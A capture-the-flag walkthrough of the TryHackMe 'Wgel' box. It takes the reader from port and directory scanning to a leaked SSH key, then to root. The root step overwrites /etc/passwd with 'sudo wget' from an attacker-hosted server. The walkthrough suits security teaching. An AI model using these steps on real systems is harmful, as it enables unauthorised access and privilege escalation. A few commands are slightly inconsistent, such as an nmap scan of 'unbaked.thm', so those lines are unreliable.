TryHackMe Wgel Writeup
This guide will help you solve the TryHackMe Wgel box. Before we start enumerating the box, add the following line to your /etc/hosts file.
<BOX_IP> wgel.thm
TryHackMe Wgel – Enumeration
As per usual, we start by checking open ports. For this we use a tool called nmap. Run the following command:
nmap -sV -sC unbaked.thm
The sV flag is used to detect version information. The sC flag is added to execute some common scripts against the target. The output of the nmap scan can be seen below:
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 94:96:1b:66:80:1b:76:48:68:2d:14:b5:9a:01:aa:aa (RSA) | 256 18:f7:10:cc:5f:40:f6:cf:92:f8:69:16:e2:48:f4:38 (ECDSA) |_ 256 b9:0b:97:2e:45:9b:f3:2a:4b:11:c7:83:10:33:e0:ce (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
It seems like port 80 and port 22 are the only open ports. The service on port 22 is an OpenSSH service and the service on port 80 runs an Apache web server. Let’s start with enumerating the web server!
TryHackMe Wgel – Enumerating Apache server
By checking out the root directory of the Apache server we see the following page:
Here we see the default Apache web page. Nothing seems out of the ordinary here. However, when inspecting the page source we find the following snippet:
<!-- Jessie don't forget to udate the webiste -->
For now, we remember this username: jessie and try to find some hidden directories and files using gobuster.
Run gobuster by executing the following command:
gobuster dir -u http://wgel.thm/ -w /usr/share/wordlists/common.txt
The output can be seen below:
/.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /index.html (Status: 200) /server-status (Status: 403) /sitemap (Status: 301)
We find another directory and can run gobuster again to find hidden files and directories within the sitemap directory. To do so run the following command:
gobuster dir -u http://wgel.thm/sitemap/ -w /usr/share/wordlists/common.txt
The output can be seen below:
/.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /.ssh (Status: 301) /css (Status: 301) /fonts (Status: 301) /images (Status: 301) /index.html (Status: 200) /js (Status: 301)
TryHackMe Wgel – User Flag
The directory which stands out the most here is the .ssh directory. This directory contains a single file: id_rsa. Download this file by running the following command:
wget http://wgel.thm/sitemap/.ssh/id_rsa
Now this might be the SSH key for the jessie user to log into the server. Let’s try this out. Run the following commands:
chmod 400 id_rsa ssh -i id_rsa [email protected]
You should now see the following snippet, indicating that you successfully logged into the server:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-45-generic i686) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 8 packages can be updated. 8 updates are security updates. jessie@CorpOne:~$
The user flag can be found here:/home/jessie/Documents/user_flag.txt.
TryHackMe Wgel – Root Flag
Running sudo -l provides us with sudo commands which the jessie user is allowed to execute. Run the command to see the following snippet:
Matching Defaults entries for jessie on CorpOne:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jessie may run the following commands on CorpOne:
(ALL : ALL) ALL
(root) NOPASSWD: /usr/bin/wget
We are allowed to execute the wget command as the root user! By browsing to GTFOBins we find the command to execute to elevate privileges to the root user using wget. We do so by overwriting the /etc/passwd file to your attacking machine by running the following command on your host machine:
cp /etc/passwd /tmp cd /tmp python3 -m http.server
The next step is copying this passwd to our attacking machine. On your attacking machine run:
wget http://wgel.thm:8000/passwd
Currently, the passwd file has the following contents:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false whoopsie:x:109:117::/nonexistent:/bin/false avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false saned:x:119:127::/var/lib/saned:/bin/false usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false jessie:x:1000:1000:jessie,,,:/home/jessie:/bin/bash sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
In order for this elevation to work, we first have to generate a new password. Do so by running:
openssl passwd obz
The output is: fMCLXeGpn7bFY. Now change the first line of the passwd file to:
root:fMCLXeGpn7bFY:0:0:root:/root:/bin/bash
Save the file and now start your a new Python Simple Web server on your attacking machine by running:
python3 -m http.server
The last step is to run the following commands on your host machine:
sudo wget http://<ATTACK_MACHINE>:8000/passwd -O /etc/passwd su PROVIDE "obz" HERE
Note: the capitalized words are no commands
If all goes well, you should see the following in your terminal:
root@CorpOne:/home/jessie#
This means that we are the root user and pwnd the box! The root flag is located at /root/root_flag.txt.
This was a nice and simple box to root. The key take-away here is that even simple commands as wget are able to elevate your privileges.
